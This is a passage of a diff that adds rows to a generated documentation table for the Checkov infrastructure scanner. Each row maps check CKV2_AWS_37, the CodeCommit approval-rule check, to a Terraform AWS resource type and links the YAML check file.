resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 584 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 585 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 586 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 587 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 588 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 589 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 590 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 591 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 592 | CKV2_AWS_37 | resource | 
aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 593 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 594 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 595 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 596 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 597 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 598 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 599 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 600 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 601 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 602 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 603 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 604 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 605 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 606 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 607 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 608 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 609 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 610 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 611 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 612 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 613 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 614 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 615 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 616 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 617 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 618 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 619 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 620 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 621 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 622 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 623 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 624 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 625 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 626 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 627 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 628 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 629 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 630 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 631 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 632 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 633 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 634 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 635 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 636 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 637 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 638 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 639 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 640 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 641 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 642 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 643 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 644 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 645 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 646 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 647 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 648 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 649 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 650 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 651 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 652 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 653 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 654 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 655 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 656 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 657 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 658 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 659 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 660 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 661 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 662 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 663 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 664 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 665 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 666 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 667 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 668 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 669 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 670 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 671 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 672 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 673 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 674 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 675 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 676 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 677 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 678 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 679 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 680 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 681 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 682 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 683 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 684 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 685 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 686 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
